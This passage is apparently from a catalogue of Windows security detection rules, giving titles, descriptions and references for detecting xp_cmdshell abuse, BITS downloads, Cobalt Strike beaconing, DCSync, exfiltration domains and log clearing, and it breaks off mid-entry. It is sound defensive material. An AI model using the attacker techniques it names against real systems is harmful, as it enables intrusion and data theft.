https://www.netspi.com/blog/technical/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/, https://learn.microsoft.com/en-us/sql/t-sql/statements/drop-server-audit-transact-sql?view=sql-server-ver16, https://learn.microsoft.com/en-us/sql/t-sql/statements/alter-server-audit-transact-sql?view=sql-server-ver16 |
MSSQL Server Failed Logon |
Detects failed logon attempts from clients to MSSQL server. |
https://cybersecthreat.com/2020/07/08/enable-mssql-authentication-log-to-eventlog/, https://www.experts-exchange.com/questions/27800944/EventID-18456-Failed-to-open-the-explicitly-specified-database.html |
MSSQL Server Failed Logon From External Network |
Detects failed logon attempts from clients with external network IP to an MSSQL server. This can be a sign of a bruteforce attack. |
https://cybersecthreat.com/2020/07/08/enable-mssql-authentication-log-to-eventlog/, https://www.experts-exchange.com/questions/27800944/EventID-18456-Failed-to-open-the-explicitly-specified-database.html |
MSSQL SPProcoption Set |
Detects when the a stored procedure is set or cleared for automatic execution in MSSQL. A stored procedure that is set to automatic execution runs every time an instance of SQL Server is started |
https://www.netspi.com/blog/technical/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/, https://learn.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/sp-procoption-transact-sql?view=sql-server-ver16 |
MSSQL XPCmdshell Suspicious Execution |
Detects when the MSSQL "xp_cmdshell" stored procedure is used to execute commands |
https://www.netspi.com/blog/technical/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/, https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/ |
MSSQL XPCmdshell Option Change |
Detects when the MSSQL "xp_cmdshell" stored procedure setting is changed.
|
https://www.netspi.com/blog/technical/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/, https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/ |
Relevant Anti-Virus Signature Keywords In Application Log |
Detects potentially highly relevant antivirus events in the application log based on known virus signature names and malware keywords.
|
https://www.virustotal.com/gui/file/13828b390d5f58b002e808c2c4f02fdd920e236cc8015480fa33b6c1a9300e31, https://www.virustotal.com/gui/file/15b57c1b68cd6ce3c161042e0f3be9f32d78151fe95461eedc59a79fc222c7ed, https://www.virustotal.com/gui/file/5092b2672b4cb87a8dd1c2e6047b487b95995ad8ed5e9fc217f46b8bfb1b8c01, https://www.nextron-systems.com/?s=antivirus |
Remote Access Tool - ScreenConnect Command Execution |
Detects command execution via ScreenConnect RMM |
https://www.huntandhackett.com/blog/revil-the-usage-of-legitimate-remote-admin-tooling, https://github.com/SigmaHQ/sigma/pull/4467 |
Remote Access Tool - ScreenConnect File Transfer |
Detects file being transferred via ScreenConnect RMM |
https://www.huntandhackett.com/blog/revil-the-usage-of-legitimate-remote-admin-tooling, https://github.com/SigmaHQ/sigma/pull/4467 |
Microsoft Malware Protection Engine Crash - WER |
This rule detects a suspicious crash of the Microsoft Malware Protection Engine |
https://bugs.chromium.org/p/project-zero/issues/detail?id=1252&desc=5, https://technet.microsoft.com/en-us/library/security/4022344 |
File Was Not Allowed To Run |
Detect run not allowed files. Applocker is a very useful tool, especially on servers where unprivileged users have access. For example terminal servers. You need configure applocker and log collect to receive these events. |
https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/applocker/what-is-applocker, https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/applocker/using-event-viewer-with-applocker, https://nxlog.co/documentation/nxlog-user-guide/applocker.html |
Sysinternals Tools AppX Versions Execution |
Detects execution of Sysinternals tools via an AppX package. Attackers could install the Sysinternals Suite to get access to tools such as psexec and procdump to avoid detection based on System paths |
Internal Research |
Deployment AppX Package Was Blocked By AppLocker |
Detects an appx package deployment that was blocked by AppLocker policy |
https://learn.microsoft.com/en-us/windows/win32/appxpkg/troubleshooting, https://github.com/nasbench/EVTX-ETW-Resources/blob/7a806a148b3d9d381193d4a80356016e6e8b1ee8/ETWEventsList/CSV/Windows11/22H2/W11_22H2_Pro_20220920_22621.382/Providers/Microsoft-Windows-AppXDeployment-Server.csv |
Potential Malicious AppX Package Installation Attempts |
Detects potential installation or installation attempts of known malicious appx packages |
https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/, https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/, https://forensicitguy.github.io/analyzing-magnitude-magniber-appx/ |
Deployment Of The AppX Package Was Blocked By The Policy |
Detects an appx package deployment that was blocked by the local computer policy |
https://learn.microsoft.com/en-us/windows/win32/appxpkg/troubleshooting, https://github.com/nasbench/EVTX-ETW-Resources/blob/7a806a148b3d9d381193d4a80356016e6e8b1ee8/ETWEventsList/CSV/Windows11/22H2/W11_22H2_Pro_20220920_22621.382/Providers/Microsoft-Windows-AppXDeployment-Server.csv |
Suspicious AppX Package Installation Attempt |
Detects an appx package installation with the error code "0x80073cff" which indicates that the package didn't meet the signing requirements and could be suspicious |
Internal Research, https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/, https://learn.microsoft.com/en-us/windows/win32/appxpkg/troubleshooting, https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/ |
Suspicious Remote AppX Package Locations |
Detects an appx package added to the pipeline of the "to be processed" packages which was downloaded from a suspicious domain.
|
Internal Research, https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/, https://learn.microsoft.com/en-us/windows/win32/appxpkg/troubleshooting, https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/ |
Suspicious AppX Package Locations |
Detects an appx package added the pipeline of the "to be processed" packages which is located in suspicious locations |
Internal Research, https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/, https://learn.microsoft.com/en-us/windows/win32/appxpkg/troubleshooting, https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/ |
Uncommon AppX Package Locations |
Detects an appx package added the pipeline of the "to be processed" packages which is located in uncommon locations |
Internal Research, https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/, https://learn.microsoft.com/en-us/windows/win32/appxpkg/troubleshooting, https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/ |
Suspicious Digital Signature Of AppX Package |
Detects execution of AppX packages with known suspicious or malicious signature |
Internal Research, https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/ |
New BITS Job Created Via Bitsadmin |
Detects the creation of a new bits job by Bitsadmin |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md |
New BITS Job Created Via PowerShell |
Detects the creation of a new bits job by PowerShell |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md |
BITS Transfer Job Downloading File Potential Suspicious Extension |
Detects new BITS transfer job saving local files with potential suspicious extensions |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md |
BITS Transfer Job Download From File Sharing Domains |
Detects BITS transfer job downloading files from a file sharing domain. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md, https://twitter.com/malmoeb/status/1535142803075960832, https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker, https://www.microsoft.com/en-us/security/blog/2024/01/17/new-ttps-observed-in-mint-sandstorm-campaign-targeting-high-profile-individuals-at-universities-and-research-orgs/ |
BITS Transfer Job Download From Direct IP |
Detects a BITS transfer job downloading file(s) from a direct IP address. |
https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin, https://isc.sans.edu/diary/22264, https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/, https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/ |
BITS Transfer Job With Uncommon Or Suspicious Remote TLD |
Detects a suspicious download using the BITS client from a FQDN that is unusual. Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md, https://twitter.com/malmoeb/status/1535142803075960832 |
BITS Transfer Job Download To Potential Suspicious Folder |
Detects new BITS transfer job where the LocalName/Saved file is stored in a potentially suspicious location |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md |
Certificate Private Key Acquired |
Detects when an application acquires a certificate private key |
https://www.splunk.com/en_us/blog/security/breaking-the-chain-defending-against-certificate-services-abuse.html |
Certificate Exported From Local Certificate Store |
Detects when an application exports a certificate (and potentially the private key as well) from the local Windows certificate store. |
https://www.splunk.com/en_us/blog/security/breaking-the-chain-defending-against-certificate-services-abuse.html |
CodeIntegrity - Unmet Signing Level Requirements By File Under Validation |
Detects attempted file load events that did not meet the signing level requirements. It often means the file's signature is revoked or a signature with the Lifetime Signing EKU has expired.
This event is best correlated with EID 3089 to determine the error of the validation.
|
https://twitter.com/SBousseaden/status/1483810148602814466, https://github.com/MicrosoftDocs/windows-itpro-docs/blob/40fe118976734578f83e5e839b9c63ae7a4af82d/windows/security/threat-protection/windows-defender-application-control/event-id-explanations.md#windows-codeintegrity-operational-log, https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/operations/event-tag-explanations, https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/operations/event-id-explanations |
CodeIntegrity - Disallowed File For Protected Processes Has Been Blocked |
Detects block events for files that are disallowed by code integrity for protected processes |
https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/operations/event-id-explanations, https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/operations/event-tag-explanations, Internal Research |
CodeIntegrity - Blocked Image/Driver Load For Policy Violation |
Detects blocked load events that did not meet the authenticode signing level requirements or violated the code integrity policy. |
https://twitter.com/wdormann/status/1590434950335320065, https://github.com/MicrosoftDocs/windows-itpro-docs/blob/40fe118976734578f83e5e839b9c63ae7a4af82d/windows/security/threat-protection/windows-defender-application-control/event-id-explanations.md#windows-codeintegrity-operational-log, https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/operations/event-id-explanations |
CodeIntegrity - Blocked Driver Load With Revoked Certificate |
Detects blocked load attempts of revoked drivers |
https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/operations/event-id-explanations, https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/operations/event-tag-explanations, Internal Research |
CodeIntegrity - Revoked Kernel Driver Loaded |
Detects the load of a revoked kernel driver |
https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/operations/event-id-explanations, https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/operations/event-tag-explanations, Internal Research |
CodeIntegrity - Blocked Image Load With Revoked Certificate |
Detects blocked image load events with revoked certificates by code integrity. |
https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/operations/event-id-explanations, https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/operations/event-tag-explanations, Internal Research |
CodeIntegrity - Revoked Image Loaded |
Detects image load events with revoked certificates by code integrity. |
https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/operations/event-id-explanations, https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/operations/event-tag-explanations, Internal Research |
CodeIntegrity - Unsigned Kernel Module Loaded |
Detects the presence of a loaded unsigned kernel module on the system. |
https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/operations/event-id-explanations, https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/operations/event-tag-explanations, Internal Research |
CodeIntegrity - Unsigned Image Loaded |
Detects loaded unsigned image on the system |
https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/operations/event-id-explanations, https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/operations/event-tag-explanations, Internal Research |
CodeIntegrity - Unmet WHQL Requirements For Loaded Kernel Module |
Detects loaded kernel modules that did not meet the WHQL signing requirements. |
https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/operations/event-id-explanations, https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/operations/event-tag-explanations, Internal Research |
Loading Diagcab Package From Remote Path |
Detects loading of diagcab packages from a remote path, as seen in DogWalk vulnerability |
https://twitter.com/nas_bench/status/1539679555908141061, https://twitter.com/j00sean/status/1537750439701225472 |
DNS Query for Anonfiles.com Domain - DNS Client |
Detects DNS queries for anonfiles.com, which is an anonymous file upload platform often used for malicious purposes |
https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-blackbyte |
DNS Query To MEGA Hosting Website - DNS Client |
Detects DNS queries for subdomains related to MEGA sharing website |
https://research.nccgroup.com/2021/05/27/detecting-rclone-an-effective-tool-for-exfiltration/ |
DNS Query To Put.io - DNS Client |
Detects DNS queries for subdomains related to "Put.io" sharing website. |
https://darkatlas.io/blog/medusa-ransomware-group-opsec-failure |
Query Tor Onion Address - DNS Client |
Detects DNS resolution of an .onion address related to Tor routing networks |
https://www.logpoint.com/en/blog/detecting-tor-use-with-logpoint/ |
DNS Query To Ufile.io - DNS Client |
Detects DNS queries to "ufile.io", which was seen abused by malware and threat actors as a method for data exfiltration |
https://thedfirreport.com/2021/12/13/diavol-ransomware/ |
Suspicious Cobalt Strike DNS Beaconing - DNS Client |
Detects a program that invoked suspicious DNS queries known from Cobalt Strike beacons |
https://www.icebrg.io/blog/footprints-of-fin7-tracking-actor-patterns, https://www.sekoia.io/en/hunting-and-detecting-cobalt-strike/ |
Failed DNS Zone Transfer |
Detects when a DNS zone transfer failed. |
https://kb.eventtracker.com/evtpass/evtpages/EventId_6004_Microsoft-Windows-DNS-Server-Service_65410.asp |
DNS Server Error Failed Loading the ServerLevelPluginDLL |
Detects a DNS server error in which a specified plugin DLL (in registry) could not be loaded |
https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83, https://technet.microsoft.com/en-us/library/cc735829(v=ws.10).aspx, https://twitter.com/gentilkiwi/status/861641945944391680 |
USB Device Plugged |
Detects plugged/unplugged USB devices |
https://df-stream.com/2014/01/the-windows-7-event-log-and-usb-device/, https://www.techrepublic.com/article/how-to-track-down-usb-flash-drive-usage-in-windows-10s-event-viewer/ |
Uncommon New Firewall Rule Added In Windows Firewall Exception List |
Detects when a rule has been added to the Windows Firewall exception list |
https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd364427(v=ws.10) |
New Firewall Rule Added In Windows Firewall Exception List For Potential Suspicious Application |
Detects the addition of a new rule to the Windows Firewall exception list for an application located in a potentially suspicious location. |
https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd364427(v=ws.10), https://app.any.run/tasks/7123e948-c91e-49e0-a813-00e8d72ab393/# |
New Firewall Rule Added In Windows Firewall Exception List Via WmiPrvSE.EXE |
Detects the addition of a new "Allow" firewall rule by the WMI process (WmiPrvSE.EXE).
This can occur if an attacker leverages PowerShell cmdlets such as "New-NetFirewallRule", or directly uses WMI CIM classes such as "MSFT_NetFirewallRule".
|
https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md#atomic-test-24---set-a-firewall-rule-using-new-netfirewallrule, https://malware.news/t/the-rhysida-ransomware-activity-analysis-and-ties-to-vice-society/72170, https://cybersecuritynews.com/rhysida-ransomware-attacking-windows/ |
All Rules Have Been Deleted From The Windows Firewall Configuration |
Detects when a all the rules have been deleted from the Windows Defender Firewall configuration |
https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd364427(v=ws.10) |
A Rule Has Been Deleted From The Windows Firewall Exception List |
Detects when a single rules or all of the rules have been deleted from the Windows Defender Firewall |
https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd364427(v=ws.10) |
The Windows Defender Firewall Service Failed To Load Group Policy |
Detects activity when The Windows Defender Firewall service failed to load Group Policy |
https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd364427(v=ws.10) |
Windows Defender Firewall Has Been Reset To Its Default Configuration |
Detects activity when Windows Defender Firewall has been reset to its default configuration |
https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd364427(v=ws.10) |
Windows Firewall Settings Have Been Changed |
Detects activity when the settings of the Windows firewall have been changed |
https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd364427(v=ws.10) |
ETW Logging/Processing Option Disabled On IIS Server |
Detects changes to of the IIS server configuration in order to disable/remove the ETW logging/processing option. |
https://learn.microsoft.com/en-us/iis/manage/provisioning-and-managing-iis/configure-logging-in-iis, https://www.microsoft.com/en-us/security/blog/2022/12/12/iis-modules-the-evolution-of-web-shells-and-how-to-detect-them/, https://learn.microsoft.com/en-us/iis/configuration/system.applicationhost/sites/sitedefaults/logfile/ |
HTTP Logging Disabled On IIS Server |
Detects changes to of the IIS server configuration in order to disable HTTP logging for successful requests. |
https://learn.microsoft.com/en-us/iis/manage/provisioning-and-managing-iis/configure-logging-in-iis, https://www.microsoft.com/en-us/security/blog/2022/12/12/iis-modules-the-evolution-of-web-shells-and-how-to-detect-them/, https://learn.microsoft.com/en-us/iis/configuration/system.webserver/httplogging |
New Module Module Added To IIS Server |
Detects the addition of a new module to an IIS server. |
https://learn.microsoft.com/en-us/iis/manage/provisioning-and-managing-iis/configure-logging-in-iis, https://www.microsoft.com/en-us/security/blog/2022/12/12/iis-modules-the-evolution-of-web-shells-and-how-to-detect-them/, https://www.microsoft.com/en-us/security/blog/2022/07/26/malicious-iis-extensions-quietly-open-persistent-backdoors-into-servers/, https://learn.microsoft.com/en-us/iis/get-started/introduction-to-iis/iis-modules-overview |
Previously Installed IIS Module Was Removed |
Detects the removal of a previously installed IIS module. |
https://learn.microsoft.com/en-us/iis/manage/provisioning-and-managing-iis/configure-logging-in-iis, https://www.microsoft.com/en-us/security/blog/2022/12/12/iis-modules-the-evolution-of-web-shells-and-how-to-detect-them/, https://www.microsoft.com/en-us/security/blog/2022/07/26/malicious-iis-extensions-quietly-open-persistent-backdoors-into-servers/, https://learn.microsoft.com/en-us/iis/get-started/introduction-to-iis/iis-modules-overview |
Potential Active Directory Reconnaissance/Enumeration Via LDAP |
Detects potential Active Directory enumeration via LDAP |
https://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/hunting-for-reconnaissance-activities-using-ldap-search-filters/ba-p/824726, https://github.com/PowerShellMafia/PowerSploit/blob/d943001a7defb5e0d1657085a77a0e78609be58f/Recon/PowerView.ps1, https://github.com/BloodHoundAD/SharpHound3/blob/7d96b991b1887ff50349ce59c80980bc0d95c86a/SharpHound3/LdapBuilder.cs, https://medium.com/falconforce/falconfriday-detecting-active-directory-data-collection-0xff21-c22d1a57494c, https://github.com/fox-it/BloodHound.py/blob/d65eb614831cd30f26028ccb072f5e77ca287e0b/bloodhound/ad/domain.py#L427, https://ipurple.team/2024/07/15/sharphound-detection/ |
Standard User In High Privileged Group |
Detect standard users login that are part of high privileged groups such as the Administrator group |
https://learn.microsoft.com/en-us/windows-server/identity/ad-ds/manage/understand-security-identifiers, https://learn.microsoft.com/en-us/windows-server/security/credentials-protection-and-management/configuring-additional-lsa-protection, https://github.com/nasbench/EVTX-ETW-Resources/blob/7a806a148b3d9d381193d4a80356016e6e8b1ee8/ETWProvidersManifests/Windows11/22H2/W11_22H2_Pro_20221220_22621.963/WEPExplorer/LsaSrv.xml |
ProxyLogon MSExchange OabVirtualDirectory |
Detects specific patterns found after a successful ProxyLogon exploitation in relation to a Commandlet invocation of Set-OabVirtualDirectory |
https://bi-zone.medium.com/hunting-down-ms-exchange-attacks-part-1-proxylogon-cve-2021-26855-26858-27065-26857-6e885c5f197c |
Mailbox Export to Exchange Webserver |
Detects a successful export of an Exchange mailbox to untypical directory or with aspx name suffix which can be used to place a webshell or the needed role assignment for it |
https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html |
Certificate Request Export to Exchange Webserver |
Detects a write of an Exchange CSR to an untypical directory or with aspx name suffix which can be used to place a webshell |
https://twitter.com/GossiTheDog/status/1429175908905127938 |
Remove Exported Mailbox from Exchange Webserver |
Detects removal of an exported Exchange mailbox which could be to cover tracks from ProxyShell exploit |
https://github.com/rapid7/metasploit-framework/blob/1416b5776d963f21b7b5b45d19f3e961201e0aed/modules/exploits/windows/http/exchange_proxyshell_rce.rb#L430 |
Exchange Set OabVirtualDirectory ExternalUrl Property |
Rule to detect an adversary setting OabVirtualDirectory External URL property to a script in Exchange Management log |
https://twitter.com/OTR_Community/status/1371053369071132675 |
MSExchange Transport Agent Installation - Builtin |
Detects the Installation of a Exchange Transport Agent |
https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=7 |
Failed MSExchange Transport Agent Installation |
Detects a failed installation of a Exchange Transport Agent |
https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=8 |
NTLM Logon |
Detects logons using NTLM, which could be caused by a legacy source or attackers |
https://twitter.com/JohnLaTwC/status/1004895028995477505 |
NTLM Brute Force |
Detects common NTLM brute force device names |
https://www.varonis.com/blog/investigate-ntlm-brute-force |
Potential Remote Desktop Connection to Non-Domain Host |
Detects logons using NTLM to hosts that are potentially not part of the domain. |
n/a |
OpenSSH Server Listening On Socket |
Detects scenarios where an attacker enables the OpenSSH server and server starts to listening on SSH socket. |
https://github.com/mdecrevoisier/EVTX-to-MITRE-Attack/tree/master/TA0008-Lateral%20Movement/T1021.004-Remote%20Service%20SSH, https://winaero.com/enable-openssh-server-windows-10/, https://learn.microsoft.com/en-us/windows-server/administration/openssh/openssh_install_firstuse, https://virtualizationreview.com/articles/2020/05/21/ssh-server-on-windows-10.aspx, https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16 |
Azure AD Health Monitoring Agent Registry Keys Access |
This detection uses Windows security events to detect suspicious access attempts to the registry key of Azure AD Health monitoring agent.
This detection requires an access control entry (ACE) on the system access control list (SACL) of the following securable object HKLM\SOFTWARE\Microsoft\Microsoft Online\Reporting\MonitoringAgent.
|
https://o365blog.com/post/hybridhealthagent/, https://github.com/OTRF/Set-AuditRule/blob/c3dec5443414231714d850565d364ca73475ade5/rules/registry/aad_connect_health_monitoring_agent.yml |
Azure AD Health Service Agents Registry Keys Access |
This detection uses Windows security events to detect suspicious access attempts to the registry key values and sub-keys of Azure AD Health service agents (e.g AD FS).
Information from AD Health service agents can be used to potentially abuse some of the features provided by those services in the cloud (e.g. Federation).
This detection requires an access control entry (ACE) on the system access control list (SACL) of the following securable object: HKLM:\SOFTWARE\Microsoft\ADHealthAgent.
Make sure you set the SACL to propagate to its sub-keys.
|
https://o365blog.com/post/hybridhealthagent/, https://github.com/OTRF/Set-AuditRule/blob/c3dec5443414231714d850565d364ca73475ade5/rules/registry/aad_connect_health_service_agent.yml |
Powerview Add-DomainObjectAcl DCSync AD Extend Right |
Backdooring domain object to grant the rights associated with DCSync to a regular user or machine account using Powerview\Add-DomainObjectAcl DCSync Extended Right cmdlet, will allow to re-obtain the pwd hashes of any user/computer |
https://twitter.com/menasec1/status/1111556090137903104, https://www.specterops.io/assets/resources/an_ace_up_the_sleeve.pdf |
AD Privileged Users or Groups Reconnaissance |
Detect priv users or groups recon based on 4661 eventid and known privileged users or groups SIDs |
https://web.archive.org/web/20230329163438/https://blog.menasec.net/2019/02/threat-hunting-5-detecting-enumeration.html |
ADCS Certificate Template Configuration Vulnerability |
Detects certificate creation with template allowing risk permission subject |
https://www.specterops.io/assets/resources/Certified_Pre-Owned.pdf |
ADCS Certificate Template Configuration Vulnerability with Risky EKU |
Detects certificate creation with template allowing risk permission subject and risky EKU |
https://www.specterops.io/assets/resources/Certified_Pre-Owned.pdf |
Add or Remove Computer from DC |
Detects the creation or removal of a computer. Can be used to detect attacks such as DCShadow via the creation of a new SPN. |
https://github.com/Yamato-Security/EnableWindowsLogSettings/blob/7f6d755d45ac7cc9fc35b0cbf498e6aa4ef19def/ConfiguringSecurityLogAuditPolicies.md, https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4741, https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4743 |
Access To ADMIN$ Network Share |
Detects access to ADMIN$ network share |
https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-5140 |
AD Object WriteDAC Access |
Detects WRITE_DAC access to a domain object |
https://threathunterplaybook.com/hunts/windows/180815-ADObjectAccessReplication/notebook.html, https://threathunterplaybook.com/library/windows/active_directory_replication.html, https://threathunterplaybook.com/hunts/windows/190101-ADModDirectoryReplication/notebook.html |
Active Directory Replication from Non Machine Account |
Detects potential abuse of Active Directory Replication Service (ADRS) from a non machine account to request credentials. |
https://threathunterplaybook.com/hunts/windows/180815-ADObjectAccessReplication/notebook.html, https://threathunterplaybook.com/library/windows/active_directory_replication.html, https://threathunterplaybook.com/hunts/windows/190101-ADModDirectoryReplication/notebook.html |
Potential AD User Enumeration From Non-Machine Account |
Detects read access to a domain user from a non-machine account |
https://www.specterops.io/assets/resources/an_ace_up_the_sleeve.pdf, http://www.stuffithoughtiknew.com/2019/02/detecting-bloodhound.html, https://learn.microsoft.com/en-us/windows/win32/adschema/attributes-all, https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4662 |
Enabled User Right in AD to Control User Objects |
Detects scenario where if a user is assigned the SeEnableDelegationPrivilege right in Active Directory it would allow control of other AD user objects. |
https://blog.harmj0y.net/activedirectory/the-most-dangerous-user-right-you-probably-have-never-heard-of/ |
Active Directory User Backdoors |
Detects scenarios where one can control another users or computers account without having to use their credentials. |
https://msdn.microsoft.com/en-us/library/cc220234.aspx, https://adsecurity.org/?p=3466, https://blog.harmj0y.net/redteaming/another-word-on-delegation/ |
Weak Encryption Enabled and Kerberoast |
Detects scenario where weak encryption is enabled for a user profile which could be used for hash/password cracking. |
https://adsecurity.org/?p=2053, https://blog.harmj0y.net/redteaming/another-word-on-delegation/ |
Hacktool Ruler |
This events that are generated when using the hacktool Ruler by Sensepost |
https://github.com/sensepost/ruler, https://github.com/sensepost/ruler/issues/47, https://github.com/staaldraad/go-ntlm/blob/cd032d41aa8ce5751c07cb7945400c0f5c81e2eb/ntlm/ntlmv1.go#L427, https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4776, https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4624 |
Remote Task Creation via ATSVC Named Pipe |
Detects remote task creation via at.exe or API interacting with ATSVC namedpipe |
https://web.archive.org/web/20230409194125/https://blog.menasec.net/2019/03/threat-hunting-25-scheduled-tasks-for.html |
Security Eventlog Cleared |
One of the Windows Eventlogs has been cleared. e.g. caused by "wevtutil cl" command execution |
https://twitter.com/deviouspolack/status/832535435960209408, https://www.hybrid-analysis.com/sample/027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745?environmentId=100, https://github.com/Azure/Azure-Sentinel/blob/f99542b94afe0ad2f19a82cc08262e7ac8e1428e/Detections/SecurityEvent/SecurityEventLogCleared.yaml |
Processes Accessing the Microphone and Webcam |
Potential adversaries accessing the microphone and webcam in an endpoint. |
https://twitter.com/duzvik/status/1269671601852813320, https://medium.com/@7a616368/can-you-track-processes-accessing-the-camera-and-microphone-7e6885b37072 |
Failed Code Integrity Checks |
Detects code integrity failures such as missing page hashes or corrupted drivers due unauthorized modification. This could be a sign of tampered binaries.
|
https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-5038, https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-6281 |
CobaltStrike Service Installations - Security |
Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement |
https://www.sans.org/webcasts/119395, https://www.crowdstrike.com/blog/getting-the-bacon-from-cobalt-strike-beacon/, https://thedfirreport.com/2021/08/29/cobalt-strike-a-defenders-guide/ |
DCERPC SMB Spoolss Named Pipe |
Detects the use of the spoolss named pipe over SMB. This can be used to trigger the authentication via NTLM of any machine that has the spoolservice enabled. |
https://posts.specterops.io/hunting-in-active-directory-unconstrained-delegation-forests-trusts-71f2b33688e1, https://dirkjanm.io/a-different-way-of-abusing-zerologon/, https://twitter.com/_dirkjan/status/1309214379003588608 |
DCOM InternetExplorer.Application Iertutil DLL Hijack - Security |
Detects a threat actor creating a file named `iertutil.dll` in the `C:\Program Files\Internet Explorer\` directory over the network for a DCOM InternetExplorer DLL Hijack scenario. |
https://threathunterplaybook.com/hunts/windows/201009-RemoteDCOMIErtUtilDLLHijack/notebook.html |
Mimikatz DC Sync |
Detects Mimikatz DC sync security events |
